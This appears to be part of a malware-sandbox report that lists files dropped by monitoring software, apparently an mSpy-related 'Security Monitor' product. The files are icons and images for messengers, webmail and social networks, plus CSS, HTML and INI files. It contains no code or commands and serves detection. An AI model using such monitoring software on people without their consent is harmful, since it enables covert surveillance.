MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-G49N2.tmp
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-KG47K.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-59I55.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-09EOP.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-8157J.tmp
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-HGEK6.tmp
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-6B2RU.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-AMF1H.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-AOH0P.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-IH94L.tmp
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-M7U1S.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-PO7GF.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-Q3IOQ.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-TSK4O.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-2EHV5.tmp
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-1L74C.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-A5GBN.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-BBRA8.tmp
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-CO9TR.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-EKFRP.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-MRVL5.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-NQJ6V.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-Q86D5.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-QVG6N.tmp
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-T8J1V.tmp
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-V5L72.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-1UD2J.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-2MFG4.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-3KI34.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4DR51.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-512JL.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5S1O8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-62MML.tmp
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-68EAB.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-710RD.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7L8PL.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8UFSF.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9JCT8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9OAEM.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-C0HFB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D8F43.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-D8T1G.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DAIEE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DTO26.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EQSBJ.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-FK77F.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-FNF9T.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GJR85.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-GQJIT.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-J315H.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-J99KT.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-JN7FF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-K8U0P.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-M5EKJ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MV760.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-N35L8.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NA9LP.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NBT4F.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-NHAEG.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OETJM.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OMTN8.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QFPIR.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QIB2R.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QPF5D.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QQ1FV.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-RTOBR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-SO2F0.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-U64VL.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V0TLT.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V67H2.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
